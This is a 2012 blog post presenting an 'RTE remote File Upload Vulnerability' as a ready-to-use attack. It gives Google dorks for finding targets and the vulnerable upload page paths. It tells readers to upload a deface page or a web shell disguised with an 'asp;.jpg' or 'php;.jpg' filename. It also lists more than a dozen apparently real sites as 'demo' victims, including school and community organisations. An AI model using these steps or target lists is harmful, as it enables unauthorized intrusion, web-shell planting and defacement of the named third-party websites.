Search This Blog

Saturday, June 2, 2012

RTE remote File Upload Vulnerability

Google Dorks

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/

Exploit: 
http://www.website.com/rte/RTE_popup_file_atch.asp
or
http://www.website.com/admin/RTE_popup_file_atch.asp


Goto Url and Upload your deface page or upload your shell as asp;.jpg or php;.jpg


demo- http://www.billkonigsberg.commy_documents/my_files/E4A_backlinks.html
 You'll see Your Uploded file URL in this Box



File URL:

http://www.billkonigsberg.com/my_documents/my_files/B84_xd.html

More Demo Websits :
lakeguntersville.org/RTE_popup_file_atch.asp
http://solonschools.org/portal/webquest/RTE_popup_file_atch.asp
adventureandspirit.com/ RTE_popup_file_atch.asp
admin.healthyudelmarva.org/RTE_popup_file_atch.asp
adnormous.com/RTE_popup_file_atch.asp
acbathai.org/admin/RTE_popup_file_atch.asp
lksd.org/wow/aoody/RTE_popup_file_atch.asp
tasar.org.uk/startpage/RTE_popup_file_atch.asp
seacoastredondo.com/admin/RTE_popup_file_atch.asp
plymouth-chamber.co.uk/RTE_popup_file_atch.asp
pgathailand.com/scripts/RTE_popup_file_atch.asp
loor.ir/sysop/RTE_popup_file_atch.asp
jrf.org.tw/newjrf/RTE_popup_file_atch.asp
rutc.ac.uk/corpnew/webwiz/RTE_popup_file_atch.asp

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
Posted by Vishal S Sangwa at 6/02/2012 12:09:00 PM
Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)